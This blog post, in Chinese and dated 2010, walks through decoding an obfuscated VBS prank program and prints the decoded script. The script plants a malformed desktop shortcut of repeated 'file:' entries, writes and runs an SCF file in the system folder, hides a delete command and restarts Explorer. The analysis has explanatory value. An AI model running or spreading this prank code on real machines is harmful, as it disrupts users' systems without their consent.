一个VBS恶作剧程序的解密

标签: , , ,

标题: 一个VBS恶作剧程序的解密
作者: Demon
链接: https://demon.tw/programming/vbs-joke-decode.html
版权: 本博客的所有文章,都遵守“署名-非商业性使用-相同方式共享 2.5 中国大陆”协议条款。

就是我之前在百度HI上看到的加密的恶作剧程序。之前解密的时候犯了一个很愚蠢的错误,竟然把循环的次数看错了。

那个上面贴出的程序运行后生成一个EZJ.VBE文件,用Script Decoder将其解码成EZJ.VBS,然后将

Execute FG5bhgNStr

替换为

Set file = HgyuR5Y3v.OpenTextFile((zhVVB4tr6 - 16535685)&".vbs",2,True)
file.Write FG5bhgNStr

双击运行,得到501个vbs文件,其中70.vbs就是解密后的代码,如下

Rem EnCode_4.0 By baomaboy
On Error Resume Next
Set sexc4rt = WScript.CreateObject("WScript.Shell")
Set CcYdrdTE = CreateObject("Scripting.FileSystemObject")
RName = Int((9876543210 - 1234567890 + 1) * Rnd + 1234567890)
UrlFile = CcYdrdTE.BuildPath(sexc4rt.SpecialFolders("Desktop"),"\"&RName&".url")
Set UrlStr = CcYdrdTE.OpenTextFile(UrlFile,2,True)
UrlStr.WriteLine("[InternetShortcut]"&vbcrlf&"url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:")
UrlStr.Close
WScript.Sleep 5000
Set OUrl = CcYdrdTE.OpenTextFile(CcYdrdTE.BuildPath(CcYdrdTE.GetSpecialFolder(1),"ShowDisktop.SCF"),2,True)
OUrl.Write("[Shell]"&vbcrlf&"Command=2"&vbcrlf&"IconFile=explorer.exe,3"&vbcrlf&"[Taskbar]"&vbcrlf&"command=ToggleDesktop")
OUrl.Close
sexc4rt.Run("ShowDisktop.SCF")
WScript.Sleep 16365
sexc4rt.Run("%COMSPEC% /C Del "&CcYdrdTE.GetFile(UrlFile).ShortPath),vbHide
WScript.Sleep 1000
sexc4rt.Run("explorer.exe")
WScript.Quit(0)

唉,因为一个很低级的错误,纠结了好几天。

赞赏

微信赞赏支付宝赞赏

相关文章:

  1. 又一个VBS病毒源码的解密
  2. 对VBS效率的再思考——处理二进制数据
  3. 在InternetExplorer.Application中显示本地图片
  4. VBS和C语言效率比较
  5. OpenTextFile与Unicode

随机文章:

  1. QWERTY密码:加密与解密
  2. bbPress Nginx Rewrite
  3. PHP base_convert函数的一个有趣现象
  4. VBS统计字符串全部字符出现的次数并排序
  5. C语言中的字符串常量

这篇文章发布于 2010年07月28日,星期三,12:16,归类于 程序设计。 您可以跟踪这篇文章的评论通过 RSS 2.0 feed。 您可以留下评论,或者从您的站点trackback

一条评论 发表在“一个VBS恶作剧程序的解密”上

  1. 解集SS说道:
    2016年08月1日 11:11

    IconFile=explorer.exe,3真的有必要写吗

    回复

留下回复